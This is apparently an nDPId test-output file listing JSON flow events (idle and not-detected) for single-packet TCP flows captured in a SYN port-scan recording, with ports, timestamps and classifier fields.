-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 